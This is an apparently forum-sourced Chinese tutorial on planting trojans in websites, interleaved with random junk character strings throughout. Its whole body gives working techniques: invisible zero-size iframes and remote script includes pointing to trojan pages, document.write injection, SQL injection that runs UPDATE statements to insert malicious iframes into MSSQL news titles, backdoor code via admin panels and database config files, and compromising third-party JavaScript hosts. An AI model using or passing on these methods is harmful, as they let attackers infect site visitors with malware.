总结我们一路走来的经历，不难发现多多少少漏出了不少.   技术的提高带来的更多的Webshell..连NB服务器都拿下了不少... U{"  当然木马也就患难了.... 2C]s ]v^^  

　　普通法：(Iframe用法详解 — http://zhidao.baidu.com/question/6079225.html?si=2) m{7f]u  
　　一普通的挂马的都是用框架，这是最基本的挂马方式，那就想插入哪里就写哪里了 yyY
\Oh  
最基本的语句当然是 $_:7au%X'  
<iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe> j~N1}  
  其中http://www.xxxx.com/muma.htm是我们的木马 R[W6sZ. J  
/;*HTvuA  
Js法: a_eO8 aAj  
　　上面可能是一般的挂马方式，初学者的玩法，好了，再说深一点点的，那就是js文件，现在好多网站都调有了JS xc_1|"OjK  
  其中的语句是：<script language=javascript src=./xxxx.js></script>，想到了什么，这里也可以挂马，其中我们可以远程调用自己的js T<4e%m>  
d)t]@_)R  
  比如:<script language=javascript src=http://www.xxxx.com/muma.js></script> (HAS -#D  
  这个muma.js就可以写木马了，怎么写呢，同样，我们还用最基本的iframe框架，不过在<script></script>之中可识别语言不是html,js文件可以这样写:   document.write("<iframe <iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe>"); 0j]Ya_n  
H O{GfK*  
  这种形式，这时就可以执行此js中的代码了，当然了，说白了，其实全语句就是<script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script> %
U!Ke

Js技巧: WZq$>M'ie  
　　<script></script>之中，无论什么后缀的文件，只要里面写的语句可以被javascript识别就会执行，比如<script src=http://www.xxxx.com/mm.ooaa></script> ;yig [As  
      <script src=http://www.xxxx.com/mumma.haha></script> `8iWJAP7  
I:y(xTsN  
不管后缀是什么了 都可以执行... ?+同样，如果首页调用其它网站，或者次级目录中的Html,Asp等 +[,3G5   
例:<iframe src=./about/nihao.htm width=200 height=100></iframe> -)K\n}N)`}  
也可以在nihao.htm文件里挂马，可以是htm和js，随便哪种，这种比较隐蔽，适用于主页没有写权限时利用。

　 <script>于<iframe>比较 $#m :q'K2  
貌似script整体挂马的代码长度比iframe小得多，说实用是在数据库方面，下面介绍。数据库挂马，这里我们拿mssql数据库为例子。

　　这里说的是首页调用到的数据库，比如新闻，论坛，公告，等等，一般是标题。   MzxeRvM;  
举个例子，比如首页有一条新闻为：“今日报道”，那么鼠标点此新闻，地址栏打开的新窗口为news.asp?id=XX，这种情况，这时，就可以判断此新闻是从数据库中调用的了，当然了，我们不说access，只说mssql。 

　　首页，我们要有这个网站中的一个注入点，比如就点在music.asp?id=1，同时，至少是Db_Owner权限，这时如果要挂马可以不用取到webshell，因为如果我们的目的只在于挂马的话，而且有时，还得检测mssql数据库和web服务器不在同一个机器上，那挂马的方式就是更改数据库内容，这里我说的就是这种，如上面说的，首页显示的一条新闻标题为“今日报道”，如果首页显示的标题是“今日报道</a><iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe>”，那这样的话，首页就会执行这段代码了，像这种情况，找到了注入点，就得找表名，如此新闻的表名为news，字段为title，ID等等，根据猜测 ' and1=1 …… F(: W_uB  
uxuWZ/7,W  
暴出的字段title的值就为“今日报道”，那么90%就可以猜到了，首页调用的数据库的字段就为news表中的title，这时在注入点，可以大胆提交music.asp?id=xxx;update news set title='今日报道</a><iframe src=http://www.xxxx.com/muma.htmwidth=0 height=0></iframe>' where id=1; H BRpt"  
UYV\v@&0j  
  这样就可以更改数据库了，前提是最少要少Db_Owner权限，当然也有时由于代码原因，也可以这样提交:Music.asp?id=xxx';update news set title='今日开夜</a><ifrmae src=http://www.xxxx.com/muma.htm width=0 height=0></iframe>' where id=1 and '1'='1 等等…… ;x'2C>2' z  
lm\q9O  
　　这种方法是有问题的，实战中存在不少问题，因为一般的情况下，标题都是通过<table>来限制宽度，也就是说如果你的标题的长度超过了指定的长度，那么你的代码只能写一半，这样就不能执行了，所以挂马最好的方法是用<script>这种方法来挂马了，如: F*X2v,  
music.asp?id=xxx;update news set title='今日报道</a><script src=http://www.xxxx.com.muma.htm></script>' where id=1;--长度有很大的减少，很不错。 Fe }8 21  
a$+ b=_  
后台挂马法: j|}d[wq@P  
通常拿不到webshell，就只能靠进后台挂马。  $ ;_922  
B: YY%&  
这里说的是进入了后台，但不能通过后台得到webshell，这时要仔细关察后台，像比较网站的链接、顶部底部的广告、都可以直接写入你的木马代码，等等，后台是灵活的，具体问题具体分析。不过有一点很重要，是不要打乱前台htm源文件里的代码逻辑，比如应该闭合前面的<a><img>"( 等这些符号，应该先闭合掉如</a></img>")。 Cjw7[u=x  
pCk:\T]  
其它形式 5mw!eRop  
2ET,  
例如首页调用了<iframe src=music.asp?id=1&no=view width=100></iframe>此种形势，一样可以在music.asp中直接写入iframe木马代码，如果调用的是<script src=music.asp?id=1&no=view width=100></script>在music.asp写代码时 ,Co/"oC  
请用document.write("")这种格式写入，当然，如果被挂文件中还有调用的文件可以继续往深处写，如果你够狠的话，直接写到数据库配置文件中，如conn.asp，这样好多页面可以同时挂上你的一种木马了。 LR{@rHG  
当然这里也有js文件，一样原理。 1dg-53xf>  
挂一个网站的马，不一定就得攻入他，有时没有方法的同时，可以考虑跨站。好多站用了别的站的js文件，如:<script src=http://www.sohu.com/user.js>这种情势，这时就可以考虑只拿sohu.com的权限就行了，只要能修改到user.js文件就可以挂到你要挂的站点了，同理，也有<iframe src=http://www.sohu.com/user.htm>此种情况，一样道理，剑走偏锋，达到目的，无论用什么招数了。